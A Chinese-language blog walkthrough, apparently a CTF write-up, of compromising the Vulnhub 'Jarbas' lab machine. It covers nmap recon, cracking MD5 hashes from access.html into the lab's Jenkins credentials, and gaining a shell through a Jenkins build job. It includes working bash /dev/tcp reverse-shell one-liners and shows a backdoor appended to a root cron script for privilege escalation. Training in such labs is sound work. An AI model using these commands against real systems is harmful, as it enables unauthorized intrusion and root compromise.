【Vulnhub靶机】Jarbas--Jenkins

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

image-20231125131716854

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

image-20231125131847664

详细扫描服务版本,系统

sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

image-20231125132007149

目录爆破

dirsearch -u http://10.9.75.10 -i 200  

image-20231125132323184

漏洞探测

whatweb

访问80端口

image-20231125132425330

whatweb http://10.9.75.10

image-20231125133245051

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

image-20231125132945210

hash-identifier

可以使用工具来验证加密类型

hash-identifier "5978a63b4654c73c60fa24f836386d87"  

image-20231125133052923

拿去在线网站进行md5解密

image-20231125133516690

image-20231125133605822

image-20231125133636880

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

image-20231125134737788

whatweb

whatweb http://10.9.75.10:8080

image-20231125134830353

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

image-20231125135041152

image-20231125135104467

新建一个任务

image-20231125135842524

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

image-20231125135948173

由于目标系统是linux系统,所以选择第二个execute shell

/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1

#反弹到kali上

点击应用,然后点击保存

image-20231125140121483

这个时候kali先监听6868端口

nc  -lvvp 6868  

回到页面上点击立即构建

image-20231125140412821

就反弹到kali机器上了

image-20231125140529852

页面上会显示有一个任务正在运行

image-20231125140547563

我们拿到shell是没有回显的,可以通过python获取显示shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20231125140911530

最后再计划任务里找到了以root运行 的程序

image-20231125141047389

查看文件内容

cat /etc/script/CleaningScript.sh

image-20231125141328159

可以在里面添加反弹shell,

echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

image-20231125141432284

kali监听6869端口,等待反弹

image-20231125141555084

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值